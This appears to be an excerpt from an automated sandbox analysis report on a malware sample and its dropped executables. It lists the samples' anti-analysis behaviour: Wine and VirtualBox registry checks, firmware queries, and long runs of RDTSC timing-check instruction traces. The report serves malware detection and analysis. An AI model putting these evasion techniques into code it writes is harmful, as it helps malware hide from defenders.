Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Documents\EBFBFBFIIJ.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADCA2 second address: EADCA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADCA8 second address: EADD28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FBBA93ED298h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov ebx, ecx 0x00000026 sbb ebx, 28F27F0Eh 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+122D36B0h] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007FBBA93ED298h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 js 00007FBBA93ED29Ch 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA8507 second address: EA850B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EABD6A second address: EABD70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADD28 second address: EADD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA850B second address: EA8511 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EABD70 second address: EABD87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007FBBA8502AC2h 0x0000000f js 00007FBBA8502ABCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA8511 second address: EA8532 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FBBA93ED296h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA8532 second address: EA8538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAEC08 second address: EAEC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAEC0E second address: EAEC13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAFDC0 second address: EAFDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAFDC5 second address: EAFDD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FBBA8502AB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAFDD0 second address: EAFE61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2F0Ch], eax 0x00000010 mov dword ptr [ebp+122D313Bh], edx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov dword ptr [ebp+122D24FCh], eax 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FBBA93ED298h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 jmp 00007FBBA93ED29Ch 0x00000049 mov eax, dword ptr [ebp+122D00A5h] 0x0000004f push 00000000h 0x00000051 push ecx 0x00000052 call 00007FBBA93ED298h 0x00000057 pop ecx 0x00000058 mov dword ptr [esp+04h], ecx 0x0000005c add dword ptr [esp+04h], 00000015h 0x00000064 inc ecx 0x00000065 push ecx 0x00000066 ret 0x00000067 pop ecx 0x00000068 ret 0x00000069 jne 00007FBBA93ED29Ch 0x0000006f push FFFFFFFFh 0x00000071 clc 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAFE61 second address: EAFE65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58D31 second address: E58D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7EF2 second address: EB7F13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FBBA8502ABCh 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7F13 second address: EB7F48 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FBBA93ED29Bh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b jne 00007FBBA93ED29Ah 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBBA93ED2A4h 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7F48 second address: EB7F60 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBBA8502AC0h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7F60 second address: EB7F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7F64 second address: EB7F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA8502AC4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7F7E second address: EB7FA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBBA93ED2A8h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7FA8 second address: EB7FAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF053 second address: EBF057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF057 second address: EBF05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF05D second address: EBF070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA93ED29Fh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF0F6 second address: EBF114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBBA8502AC6h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF114 second address: EBF119 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF119 second address: EBF142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edx 0x0000000c ja 00007FBBA8502ABCh 0x00000012 pop edx 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBBA8502ABBh 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF142 second address: EBF146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF146 second address: EBF14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC56A1 second address: EC56AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 jno 00007FBBA93ED296h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC57FF second address: EC5808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5808 second address: EC580E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC580E second address: EC5815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5815 second address: EC5837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FBBA93ED296h 0x0000000a jmp 00007FBBA93ED2A8h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC59B1 second address: EC59C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007FBBA8502AB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5B7B second address: EC5B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5B7F second address: EC5B89 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBBA8502AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5B89 second address: EC5BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FBBA93ED296h 0x00000009 jmp 00007FBBA93ED29Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5BA1 second address: EC5BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5CDC second address: EC5CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED2A4h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5CF9 second address: EC5CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5CFF second address: EC5D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5D03 second address: EC5D32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC1h 0x00000007 jmp 00007FBBA8502ABAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007FBBA8502AB8h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5D32 second address: EC5D43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007FBBA93ED296h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5D43 second address: EC5D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC602A second address: EC603E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED29Fh 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECB8D3 second address: ECB8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECB8D8 second address: ECB8FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FBBA93ED2A6h 0x0000000a jmp 00007FBBA93ED29Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECBA50 second address: ECBA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBBA8502AB6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECBA5E second address: ECBA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBBA93ED2A8h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC326 second address: ECC33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA8502AC3h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC33D second address: ECC343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC343 second address: ECC35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FBBA8502AB6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FBBA8502AB8h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC35F second address: ECC364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDCAD second address: ECDCB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDCB3 second address: ECDCC9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007FBBA93ED296h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED366B second address: ED366F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED366F second address: ED3673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3673 second address: ED367F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBBA8502AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED367F second address: ED3687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3687 second address: ED368B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED368B second address: ED36B1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBBA93ED296h 0x00000008 jmp 00007FBBA93ED29Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FBBA93ED296h 0x00000017 ja 00007FBBA93ED296h 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED22C8 second address: ED22CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED273A second address: ED273E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED2E93 second address: ED2E98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7BEBB second address: E7BED9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007FBBA93ED296h 0x0000000d jno 00007FBBA93ED296h 0x00000013 pop eax 0x00000014 popad 0x00000015 jc 00007FBBA93ED2A0h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1E89 second address: ED1E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FBBA8502AB6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED66D2 second address: ED66D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED66D8 second address: ED66DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF02A second address: EDF02F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDDF8E second address: EDDFA9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBBA8502AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBBA8502AC1h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C254 second address: E9C25A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C3B0 second address: E9C3BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FBBA8502AB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C3BB second address: E9C420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FBBA93ED2A7h 0x0000000d xchg eax, esi 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FBBA93ED298h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 jmp 00007FBBA93ED2A0h 0x0000002d nop 0x0000002e push edi 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 pop edi 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jc 00007FBBA93ED296h 0x00000041 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C420 second address: E9C424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C424 second address: E9C42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C4C8 second address: E9C4EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e jl 00007FBBA8502ABCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CAC0 second address: E9CB18 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FBBA93ED298h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov di, si 0x00000029 mov dh, 9Fh 0x0000002b push 0000001Eh 0x0000002d jmp 00007FBBA93ED2A7h 0x00000032 nop 0x00000033 pushad 0x00000034 jp 00007FBBA93ED29Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CB18 second address: E9CB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007FBBA8502AB6h 0x0000000c rdtsc
